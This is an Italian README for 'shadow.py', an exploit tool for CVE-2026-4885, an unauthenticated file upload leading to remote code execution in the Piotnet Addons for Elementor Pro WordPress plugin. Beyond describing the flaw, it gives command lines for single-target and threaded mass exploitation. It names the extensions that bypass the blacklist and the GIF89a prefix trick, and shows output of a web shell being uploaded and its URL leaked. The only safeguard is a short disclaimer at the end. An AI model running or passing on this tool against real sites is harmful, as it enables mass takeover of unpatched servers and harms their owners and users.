
Piotnet Addons for Elementor Pro <= 7.1.70 - Caricamento arbitrario di file non autenticato → RCE
Piotnet Addons for Elementor Pro <= 7.1.70 - Caricamento File Arbitrario Non Autenticato → RCE
Il plugin Piotnet Addons for Elementor Pro per WordPress è vulnerabile al caricamento arbitrario di file a causa della mancanza di validazione del tipo di file nella funzione pafe_ajax_form_builder in tutte le versioni fino alla 7.1.70 inclusa. Il plugin utilizza una blacklist di estensioni incompleta che blocca solo le estensioni php, phpt, php5, php7 ed exe, consentendo però il caricamento libero di estensioni pericolose come .phar o .phtml.
Ciò consente a di caricare file PHP arbitrari sul server del sito interessato, portando a .
Nota: L'exploit può essere innescato solo se un campo file viene aggiunto al modulo Piotnet.
~ Punteggio CVSS : 9.8 (Critico)
~ Vettore CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Versioni Affette : <= 7.1.70
~ Patch : Nessuna patch disponibile
~ Pubblicato Pubblicamente : 18 maggio 2026
Il gestore AJAX pafe_ajax_form_builder accetta caricamenti di file senza una validazione adeguata:
// Blacklist incompleta — blocca solo:
$blocked = ['php', 'phpt', 'php5', 'php7', 'exe'];
// .phtml, .phar, .shtml ecc. passano liberamente ✓
Il percorso di caricamento è divulgabile tramite l'azione AJAX non autenticata pafe_export_database → l'esportazione CSV contiene gli URL completi dei file.
Menu interattivo (predefinito) :
python3 shadow.py
╾──── MENU ────╼
1 ▶ un singolo target
2 ▶ scansione di massa
3 ▶ esci
[1/2/3] :
Target singolo (CLI) :
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shell.phtml
Target multipli (CLI) :
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shell.phtml
Opzioni :
-u, --url URL del target
-f, --file File con gli URL dei target (uno per riga)
-s, --shell File shell PHP personalizzato (GIF89a anteposto automaticamente)
-t, --threads Thread concorrenti per la modalità di massa (predefinito: 5)
-h, --help Mostra aiuto
form_id, post_id, field_name dall'HTML della paginapafe_export_database (senza autenticazione, senza nonce)shell.txtPrepara il tuo file shell localmente (es. shadow.phtml) — i byte magici GIF89a vengono anteposti automaticamente se mancanti.
Estensioni bloccate:
.php.phpt.php5.php7.exeUsa invece:
.phtml.phar.shtml.php8ecc.
╔══════════════════════════════════════════════════════════╗
║ ║
║ ♡ CVE-2026-4885 ║
║ Piotnet Addons for Elementor Pro <= 7.1.70 ║
║ Caricamento File Non Autenticato → RCE ║
║ ║
║ di Shadow & Friska ♡ ║
║ ║
╚══════════════════════════════════════════════════════════╝
╾──── VERSIONE ────╼
♡ v7.1.67 <= 7.1.70 — VULNERABILE
╾──── RICOGNIZIONE ────╼
◆ scansione di 46 pagine (in parallelo)...
♡ [PIOTNET] https://target.com/contact
post_id=9 | form_id=72071c0
◆ utilizzo : https://target.com/contact
╾──── EXPLOIT ────╼
◆ post_id=9 | form_id=72071c0 | campo=file
▶ tentativo .phtml ...
♡ caricato (.phtml)
♡ URL divulgato : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml
╔══════════════════════════════════════════════════════════╗
║ ★ SHELL CARICATA (.phtml) ║
║ ║
║ ◆ shell : https://target.com/wp-content/... ║
╚══════════════════════════════════════════════════════════╝
pip install httpx
Questo strumento è destinato esclusivamente a test di sicurezza educativi e autorizzati.
L'utilizzo non autorizzato contro sistemi di cui non si è proprietari o per i quali non si dispone di un permesso esplicito di test è illegale. Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo strumento.